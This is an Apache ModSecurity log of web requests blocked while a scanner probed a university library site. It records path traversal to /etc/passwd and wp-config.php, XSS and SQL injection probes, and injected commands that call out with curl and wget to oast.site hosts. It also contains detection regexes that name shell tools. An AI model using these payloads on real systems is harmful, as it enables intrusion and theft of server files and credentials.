[Tue Aug 29 11:41:26.635324 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAcrijAAAAAB"]
[Tue Aug 29 11:41:27.525394 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAQSWosAAAA0"]
[Tue Aug 29 11:41:28.522981 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gpz5xhmsgenyrz.oast.site found within TX:1: cjmnbitjmimt14dgn26gpz5xhmsgenyrz.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAQkBeYAAAAC"]
[Tue Aug 29 11:41:30.395071 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gi3be9p4unuf7j.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAXHqBQAAAAT"]
[Tue Aug 29 11:41:30.678495 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAcbSH8AAAAv"]
[Tue Aug 29 11:41:32.385333 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAcoNYgAAAAF"]
[Tue Aug 29 11:41:32.519184 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAcrilAAAAAB"]
[Tue Aug 29 11:41:33.485861 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAUKhIsAAABC"]
[Tue Aug 29 11:41:35.431419 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAQkBf8AAAAC"]
[Tue Aug 29 11:41:36.577156 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAcbSKUAAAAv"]
[Tue Aug 29 11:41:36.615510 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAcbSKcAAAAv"]
[Tue Aug 29 11:41:38.368603 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAcoNa0AAAAF"]
[Tue Aug 29 11:41:39.440134 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAaZ9wEAAAAo"]
[Tue Aug 29 11:41:40.617306 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAUKhLMAAABC"]
[Tue Aug 29 11:41:42.393697 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAcbSL8AAAAv"]
[Tue Aug 29 11:41:45.496842 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26g1dqkeb7qdmab1.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAdECTUAAAAW"]
[Tue Aug 29 11:41:46.393176 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAXHqFkAAAAT"]
[Tue Aug 29 11:41:49.639667 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAXHqGoAAAAT"]
[Tue Aug 29 11:41:56.376606 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdPLvUAAAAT"]
[Tue Aug 29 11:41:57.451952 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdZZncAAAAf"]
[Tue Aug 29 11:41:58.407413 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13FsCo-f0AAAcvBhUAAAAJ"]
[Tue Aug 29 11:42:00.375514 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gmha6nsrj4hho7.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gmha6nsrj4hho7.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAdV7YEAAAAa"]
[Tue Aug 29 11:42:01.408226 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdaZMMAAAAM"]
[Tue Aug 29 11:42:04.367275 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdUcyYAAAAZ"]
[Tue Aug 29 11:42:05.440101 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdaZM4AAAAM"]
[Tue Aug 29 11:42:06.416080 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdaZNAAAAAM"]
[Tue Aug 29 11:42:07.416219 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAdECaEAAAAW"]
[Tue Aug 29 11:42:07.703520 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAc36zIAAAAO"]
[Tue Aug 29 11:42:08.391614 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAdYBAEAAAAe"]
[Tue Aug 29 11:42:08.418853 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAc-5zQAAAAN"]
